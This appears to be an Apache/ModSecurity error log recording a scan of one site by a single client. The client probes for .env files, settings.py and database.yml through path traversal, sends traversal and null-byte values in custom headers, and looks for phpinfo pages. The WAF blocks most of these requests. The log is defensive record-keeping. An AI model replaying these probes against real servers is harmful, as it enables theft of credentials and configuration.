[Tue May 12 05:10:32.065295 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYxwAAAEY"]
[Tue May 12 05:10:32.070830 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.246:21654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKBfeipD4uoG21FoqKAAAABQ"]
[Tue May 12 05:10:32.070971 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.246:21654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKBfeipD4uoG21FoqKAAAABQ"]
[Tue May 12 05:10:32.071176 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.246:21654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKBfeipD4uoG21FoqKAAAABQ"]
[Tue May 12 05:10:32.071349 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/app/.env"] [unique_id "agKaKBfeipD4uoG21FoqKQAAABc"]
[Tue May 12 05:10:32.071457 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/.env"] [unique_id "agKaKBfeipD4uoG21FoqKQAAABc"]
[Tue May 12 05:10:32.071634 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/.env"] [unique_id "agKaKBfeipD4uoG21FoqKQAAABc"]
[Tue May 12 05:10:32.071785 2026] [:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] File does not exist: /home/ixinabou/public_html/p.php
[Tue May 12 05:10:32.082799 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKDue9Sp-pIv_Bb69LgAAAUk"]
[Tue May 12 05:10:32.082947 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKDue9Sp-pIv_Bb69LgAAAUk"]
[Tue May 12 05:10:32.083146 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaKDue9Sp-pIv_Bb69LgAAAUk"]
[Tue May 12 05:10:32.084278 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYyQAAAEY"]
[Tue May 12 05:10:32.084317 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYyQAAAEY"]
[Tue May 12 05:10:32.084338 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYyQAAAEY"]
[Tue May 12 05:10:32.084501 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYyQAAAEY"]
[Tue May 12 05:10:32.084543 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYyQAAAEY"]
[Tue May 12 05:10:32.084583 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYyQAAAEY"]
[Tue May 12 05:10:32.084885 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYyQAAAEY"]
[Tue May 12 05:10:32.085099 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.246:21632] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKNr1yOh9TvizeziYyQAAAEY"]
[Tue May 12 05:10:32.090284 2026] [:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] File does not exist: /home/ixinabou/public_html/pi.php
[Tue May 12 05:10:32.090496 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.246:21654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/api/.env"] [unique_id "agKaKBfeipD4uoG21FoqKgAAABQ"]
[Tue May 12 05:10:32.090546 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/var/www/.env"] [unique_id "agKaKNr1yOh9TvizeziYygAAAEQ"]
[Tue May 12 05:10:32.090603 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.246:21654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/.env"] [unique_id "agKaKBfeipD4uoG21FoqKgAAABQ"]
[Tue May 12 05:10:32.090673 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/var/www/.env"] [unique_id "agKaKNr1yOh9TvizeziYygAAAEQ"]
[Tue May 12 05:10:32.090780 2026] [security2:error] [pid 1808852:tid 1808875] [client 45.148.10.246:21654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/.env"] [unique_id "agKaKBfeipD4uoG21FoqKgAAABQ"]
[Tue May 12 05:10:32.090903 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/var/www/.env"] [unique_id "agKaKNr1yOh9TvizeziYygAAAEQ"]
[Tue May 12 05:10:32.101959 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKM1tk6y7yBJLpJozMgAAAJY"]
[Tue May 12 05:10:32.102009 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKM1tk6y7yBJLpJozMgAAAJY"]
[Tue May 12 05:10:32.102036 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKM1tk6y7yBJLpJozMgAAAJY"]
[Tue May 12 05:10:32.102162 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKDue9Sp-pIv_Bb69LwAAAUk"]
[Tue May 12 05:10:32.102221 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKM1tk6y7yBJLpJozMgAAAJY"]
[Tue May 12 05:10:32.102256 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKM1tk6y7yBJLpJozMgAAAJY"]
[Tue May 12 05:10:32.102303 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKDue9Sp-pIv_Bb69LwAAAUk"]
[Tue May 12 05:10:32.102495 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaKDue9Sp-pIv_Bb69LwAAAUk"]
[Tue May 12 05:10:32.102577 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKM1tk6y7yBJLpJozMgAAAJY"]
[Tue May 12 05:10:32.102788 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/health"] [unique_id "agKaKM1tk6y7yBJLpJozMgAAAJY"]
[Tue May 12 05:10:32.107835 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/var/www/html/.env"] [unique_id "agKaKNr1yOh9TvizeziYywAAAEQ"]
[Tue May 12 05:10:32.107973 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/var/www/html/.env"] [unique_id "agKaKNr1yOh9TvizeziYywAAAEQ"]
[Tue May 12 05:10:32.108158 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/var/www/html/.env"] [unique_id "agKaKNr1yOh9TvizeziYywAAAEQ"]
[Tue May 12 05:10:32.108166 2026] [:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] File does not exist: /home/ixinabou/public_html/infophp.php
